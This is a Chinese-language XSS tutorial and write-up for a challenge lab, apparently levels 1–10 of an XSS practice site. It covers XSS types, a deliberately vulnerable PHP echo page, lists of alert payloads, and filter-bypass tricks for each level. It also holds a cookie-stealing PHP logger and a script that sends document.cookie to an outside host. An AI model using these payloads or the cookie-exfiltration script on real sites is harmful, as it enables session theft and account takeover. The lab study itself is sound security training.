一.XSS
1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览
这些网页(或触发其他条件),从而执行其中的恶意代码。
1.xss实例代码:
test.html
<!DOCTYPE html>
<head>
<title>xss_test</title>
</head>
<body>
<form action="xss.php" method="post">
请输入你的名字<br>
<input type="text" name="name">
<input type="submit" value="提交">
</form>
</body>
</html>
xss.php
<!DOCTYPE html>
<head>
<meta charset="utf-8">
<title>测试结果</title>
</head>
<body>
<?php
echo $_POST['name'];
?>
</body>
</html>
获得cookie 脚本
cookie.php
<?php
$cookie = $_GET['cookie']."
";
$cookie_f = fopen('cookie.txt','a');
fwrite($cookie_f,$cookie);
fclose($cookie_f);
?>
xss.js
<script>window.open('http://www.test.com/cookie.php?cookie='+document.cookie)</script>
xss分为3类
反射型xss
存储型xss
dom型xss
2.xss的payload
<!-- 基本类型-->
<script >alert('xss')</script>
<script >alert("xss")</script>
<script >alert(/xss/)</script>
<script >alert('xss');</script>
<!-- 利用javascript伪协议 -->
<iframe src=javascript:alert('xss') ></iframe>
---------------------------------
<a href=javascript:alert('xss')>xxx</a>
两个a标签之间要加东西,不然看不到点击的地方
<!-- 利用基本事件 -->
<img src="x" onerror= alert('xss')> //图片未找到
<img src="x" onload= alert('xss')> //图片正常显示
<img src="x" onclick= alert('xss')>
| 事件 | 含义 |
|---|---|
| onclick | 鼠标单击 |
| onchange | 内容发生改变 |
| onerror | 图片等未找到时 |
| onload | 页面加载 |
| onmouseover | 鼠标悬停 |
| onmouseout | 鼠标移出 |
| onmousemove | 鼠标路过 |
onchange 用在 input 标签
<input type="text" onchange=alert('xss')>
3.xss 的一些绕过
--标签的属性支持javascript:[code]伪协议
利用空字符
常用字符:【空格】【回车】【Tab】键位符
应用场景:对JavaScript关键字过了过滤
-- 扰乱过滤规则
1)大小写混合
<sCRipt>alert('xss')</script>
2)引号的使用
<script>alert('xss')</script>
<script>alert("xss")</script>
<script>alert(/xss/)</script>
3)<iframe/src=javascript:alert(1)>
4)双写
<scr<script>ipt>alert(1111)</scr</script>ipt>
小tips
%0a用做换行使的input标签语法正确,主要是因为过滤了“>”
// js的注释
二.实战xss挑战之旅
1.第一题(无过滤措施)
首先在地址后输入我们最基本的payload,弹窗
还可以
利用 iframe 标签的的 src 属性来弹窗
<iframe src=javascript:alert('xss')></iframe>
利用标签的 href 属性来弹窗
<a href=javascript:alert('xss')>ggtest</a>
这里就是超链接到了:javascript:alert('xss')
效果和浏览器直接打开这个地址:javascript:alert('xss')是一样的
这里还可以使用:javascript:alert(document.cookie) 来弹出当前会话的 cookie
img标签来弹窗
<img src=1 onerror=alert('xss')>
2.第二题
在次尝试输入基本的payload,看到没有
右键查看源代码,搜索我们刚输入的东西,看过滤了什么
呗代码复制出来,构造payload,在input 标签里,首先想到onchange事件
<input name=keyword value="<script >alert('xss')</script>">
" onchange =alert(111) <"
还可以
"><script>alert(222)</script> <"
3.第三关
一样操作,看源代码,构造payload
过滤了尖括号
" onchange=alert(1111) /<"
' onchange='alert(/111/)
这个刚学到的,可能对< " 过滤有帮助
' onclick=alert(1)%0a
%0a用做换行使的input标签语法正确,主要是因为过滤了“>”。
4.第四关
<input name=keyword value="111">
" onchange=alert(555)<"
5.第五关
过滤了script
还过滤了on事件
只能利用javascript伪协议
"><a href=javascript:alert(111)>
6.第六关
基本全过滤
尝试大小写绕过
"><img sRc=x onError="alert(/xss/)
这样还不行,看源码,on过滤,试了一下on大写,成功
"><img sRc=x OnError="alert(/xss/)
7.第七关
<input name=keyword value="456">
尝试以下
<input name=keyword value="" Onchange=alert(123) id="">
不行,过滤on想到用伪协议
想到伪协议的绕过tab 空格 还是不行,尴尬,看上边过滤是直接把on消失,试试复写。
" Oonnchange=alert(123) id="
第八关
</center><center><BR><a href="1111">友情链接</a></center><center><img src=level8.jpg></center>
a标签,href直接使用伪协议
javascript:alert(1111)
尝试tab
| 按键 | url编码 |
|---|---|
| tab | %09 |
| enter | %0A |
| space | %20 |
--又有一方法 html10进制编码payload
第九关
尝试伪协议
并没有弹,应该是/问题,这有一个思路是把http://放到alert里
javascri pt:alert('http://')
//tab
编码
第十关
一脸懵逼,没有输入输出点啊
还是没有输出点,通过观察发现有3个隐藏的输入input,构造下看看有没有输出
http://test.com/xss1/level10.php?keyword=11111&t_link=1&t_history=2&t_sort=3
发现t_sort参数有东西,窃喜。。
<input name="t_sort" value="3" type="hidden">
构造
http://test.com/xss1/level10.php?keyword=11111&t_link=1&t_history=2&t_sort=" onmousemove=alert(111) id="
~绕过hidden属性的影响
http://test.com/xss1/level10.php?keyword=11111&t_link=1&t_history=2&t_sort=" onmosemove=alert(111) type="text"
